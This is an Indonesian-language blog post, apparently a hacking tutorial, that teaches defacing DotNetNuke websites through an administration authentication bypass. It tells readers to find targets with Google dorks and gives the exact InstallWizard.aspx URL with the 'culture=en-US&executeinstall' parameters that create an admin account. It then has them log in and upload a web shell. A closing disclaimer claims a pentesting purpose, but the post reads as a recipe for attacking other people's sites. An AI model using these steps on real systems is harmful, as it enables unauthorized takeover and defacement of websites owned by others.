DotNetNuke - Administration Authentication Bypass
Assalamualaikum Wr.Wb
Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa)
Terimakasih telah berkunjung ke web sederhanan ini. Hehe
Kali ini saya akan memberikan Tutorial Deface metode DotNetNuke - Administration Authentication Bypass
Sebelum deface sebaiknya kita mempersiapkan alat dan bahan
-Shel sendiri sendiri
-Script deface (saya rasa udah punya sendiri sendiri)
-Exploit number 39777
https://www.exploit-db.com/exploits/39777/-Dork
Use Your Brain
Langsung saja simak tutorialnya
1. Dorking site dulu di google
2. Jika sudah masukkan exploitnya menjadi seperti ini
site.co.li/Install/InstallWizard.aspx?__VIEWSTATE=
4. Jika sudah hapus __VIEWSTATE=
5. Dan tambahkan culture=en-US&executeinstall pada bagian aspx menjadi seperti ini
site.co.li/Install/InstallWizard.aspx?culture=en-US&executeinstall
6. Langkah terakhir tinggal login saja
untuk login ada 2 yaitu di default web utama dan menggunakan exploit satu ini
/Home/tabid/36/ctl/Login/Default.aspx
7. Masukkan username dan password yg kalian daftarkan tadi
8. Jika sudah login cari tempat upload shell
9. Selamat anda sudah menjadi hacker
Catatan. Saya Admin tidak pernah bertanggung jawab dengan apa yang kalian perbuat
Jika ada masalah jangan pernah menyalakan website ini
Tutor ini di buat untuk mengetest/pentester suatu website apakah web itu memiliki bug apa enggak
Mungkin hanya itu kata kata yg bisa saya ucapkan
Sekian dan Terimakasih
Wassalamualaikum Wr.Wb
No comments:
Post a Comment